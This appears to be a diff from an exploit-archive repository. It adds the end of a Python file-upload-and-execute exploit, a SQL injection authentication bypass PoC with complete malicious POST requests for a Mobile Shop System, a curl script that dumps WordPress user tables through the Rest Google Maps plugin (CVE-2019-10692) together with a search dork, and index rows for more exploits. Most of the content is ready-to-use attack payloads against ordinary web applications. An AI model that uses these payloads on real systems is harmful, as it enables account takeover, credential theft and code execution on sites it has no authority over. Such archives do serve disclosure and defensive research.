+	    'thumbnail_resize_xy': (None, 'x'),
+	    'thumbnail_resize': (None, '150'),
+	    'thumbnail_compression': (None, '70'),
+	    'upload_file_submit': (None, 'OK - Upload file')
+	}
+	HEADER_UPLOAD = {
+	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+	'Accept-Language': 'en-US,en;q=0.5',
+	'Accept-Encoding': 'gzip, deflate',
+	'Referer': URL_UPLOAD
+	}
+	response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD)
+	if FILENAME in response.text:
+		print cyan("\n[+] File uploaded and can be found!")
+	else:
+		print red("[-] File cannot be found or use different file name!")
+		sys.exit(-1)
+	URL_GET = IP + '/media/{0}'.format(FILENAME)
+	OPTIONS = str(raw_input("Exploit Now (y/n)?"))
+	print cyan("\nW0rk1ng!!! Enjoy :)")
+	SESSION.get(URL_GET)

exploits/php/webapps/48916.txt

@@ -0,0 +1,45 @@
+# Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass
+# Exploit Author: Moaaz Taha (0xStorm)
+# Date: 2020-09-08
+# Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14412&title=Mobile+Shop+System+in+PHP+MySQL
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
+
+# POC
+1- Go to "http://TARGET/mobileshop-master/login.php" or "http://TARGET/mobileshop-master/LoginAsAdmin.php"
+2- Inject this SQL payload (test' or 1=1 -- -) in email field and any password in password field.
+3- Click on "login", then you will bypass the authentication successfully.
+
+# Malicious HTTP POST Requests
+
+POST /mobileshop-master/login.php HTTP/1.1
+Host: 192.168.1.55:8888
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.55:8888/mobileshop-master/login.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 44
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+email=test%27+or+1%3D1+--+-&password=test123
+
+==========================================================================
+
+POST /mobileshop-master/LoginAsAdmin.php HTTP/1.1
+Host: 192.168.1.55:8888
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.55:8888/mobileshop-master/LoginAsAdmin.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 44
+Connection: close
+Cookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6
+Upgrade-Insecure-Requests: 1
+
+email=test%27+or+1%3D1+--+-&password=test123

exploits/php/webapps/48918.sh

@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection
+# Google Dork: inurl:index.php?rest_route=3D/wpgmza/
+# Date: 2020-09-09
+# Exploit Author: Jonatas Fil
+# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers
+# Software Link: https://wordpress.org/plugins/wp-google-maps/
+# Version: < 7.11.18
+# Tested on: Linux
+# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692)
+#!/bin/bash
+
+TARGET="192.168.1.77"
+
+curl -k --silent
+"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=
+fields=3D*+from+wp_users+--+-"
+| jq

files_exploits.csv

@@ -40726,6 +40726,18 @@ id,file,description,date,author,type,platform,port
 48905,exploits/php/webapps/48905.txt,"Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)",2020-10-19,Kokn3t,webapps,php,
 48906,exploits/php/webapps/48906.py,"Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)",2020-10-19,"Rodolfo Tavares",webapps,php,
 48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php,
+48908,exploits/hardware/webapps/48908.py,"Comtrend AR-5387un router - Persistent XSS (Authenticated)",2020-10-20,OscarAkaElvis,webapps,hardware,
+48909,exploits/php/webapps/48909.txt,"Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-20,"Akıner Kısa",webapps,php,
+48910,exploits/php/webapps/48910.txt,"Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure",2020-10-20,redtimmysec,webapps,php,
+48911,exploits/php/webapps/48911.txt,"Visitor Management System in PHP 1.0 - SQL Injection (Authenticated)",2020-10-20,"Rahul Ramkumar",webapps,php,
+48912,exploits/php/webapps/48912.py,"Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated)",2020-10-20,nag0mez,webapps,php,
+48913,exploits/php/webapps/48913.txt,"WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload",2020-10-20,Net-Hunter,webapps,php,
+48914,exploits/php/webapps/48914.txt,"User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS",2020-10-20,yusufmalikul,webapps,php,
+48915,exploits/php/webapps/48915.py,"RiteCMS 2.2.1 - Remote Code Execution (Authenticated)",2020-10-20,H0j3n,webapps,php,
+48916,exploits/php/webapps/48916.txt,"Mobile Shop System v1.0 - SQL Injection Authentication Bypass",2020-10-20,"Moaaz Taha",webapps,php,
+48917,exploits/java/webapps/48917.py,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2020-10-20,"Jonatas Fil",webapps,java,
+48918,exploits/php/webapps/48918.sh,"WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection",2020-10-20,"Jonatas Fil",webapps,php,
+48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,